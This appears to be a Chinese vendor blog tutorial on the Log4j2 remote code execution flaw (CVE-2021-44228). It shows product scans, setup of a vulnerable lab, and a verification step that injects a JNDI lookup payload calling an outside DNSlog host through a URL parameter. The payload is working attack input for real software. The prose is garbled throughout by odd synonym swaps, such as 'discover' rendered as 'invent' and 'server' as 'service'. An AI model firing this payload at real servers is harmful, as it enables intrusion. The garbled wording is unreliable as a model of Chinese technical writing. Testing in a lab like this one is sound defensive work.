数字经济的平安基石

产品技术

首页 > 凯旋门国际动态 > 技术研究 > 产品技术 > 正文

玩转Log4j2远程代码执行漏洞,凯旋门国际明鉴保姆级教程

阅读量:


2021.12.10,一个平平无奇的脱发日,突然老板来了消息。


工具发明

明鉴漏洞扫描系统

凯旋门国际明鉴漏扫产品第一时间已具备对该漏洞的扫描与检测能力,根据产品通知,将网站扫描战略升级至V1.3.582.534版本,开始做扫描任务。


1、新建战略模板,单独选择Apache Log4j 2远程代码执行扫描战略


2、新建扫描任务,选择对应战略模板并提交任务。


3、由于只针对这一个漏洞做应急扫描,任务很快执行完成,查看扫描结果,胜利发明漏洞!


明鉴Web应用弱点扫描器

将战略库版本升级至V6.1.117版本,即可具备Apache Log4j 2远程代码执行(CVE-2021-44228)漏洞发明能力。


1、新建任务填写扫描目标。


2、选择自界说战略,勾选Apache Log4j远程代码执行(CVE-2021-44228)扫描战略。


3、待任务执行完成后,查看扫描结果。依旧发明,从工具中导出报告交给领导就能交差了!


顺利完成任务,不过这个波及广泛的Apache Log4j2 远程代码执行漏洞究竟是啥,作为小白有须要一探究竟。


环境搭建

效劳器环境

操作系统:centos7.7

JAVA环境:JDK1.8

Centos7.7装置教程:

https://www.cnblogs.com/weihengblogs/p/13724167.html

JAVA环境安排教程:

https://www.cnblogs.com/stulzq/p/9286878.html


漏洞环境获取

获取地点:

https://pan.baidu.com/s/12ftEpSFnOjjITGlWNbl84w

提取码:r5pk?


后台启用Log4j2漏洞环境


nohupjava-jarspringboot-log4j2-demo-0.0.1-SNAPSHOT.jar&


拜访环境

漏洞环境的Web效劳监听8082端口,param参数会挪用log4j。这时请求一下该参数,确认环境是否正常。

http://X.X.X.X:8082/test?param=1


漏洞验证

通过dnslog.cn获取dnslog子域


构造payload


${jndi:ldap://fj537p.dnslog.cn/exp}


带入payload请求验证dns拜访


http://X.X.X.X:8082/test?param=${jndi:ldap://fj537p.dnslog.cn/exp}


查看dnslog回显

看到这个回显就证明漏洞保存了。如果没有工具借助,按此办法来也能够验证。但若想快速便捷地大批量进行验证,还是需要购买专业漏洞扫描类产品,终究下一个高危漏洞爆发咱也不知道好欠好手工验证。

关闭

与专家在线沟通, 免费获取专业解决计划

线上咨询
联系凯旋门国际

咨询电话:400-6059-110

微信咨询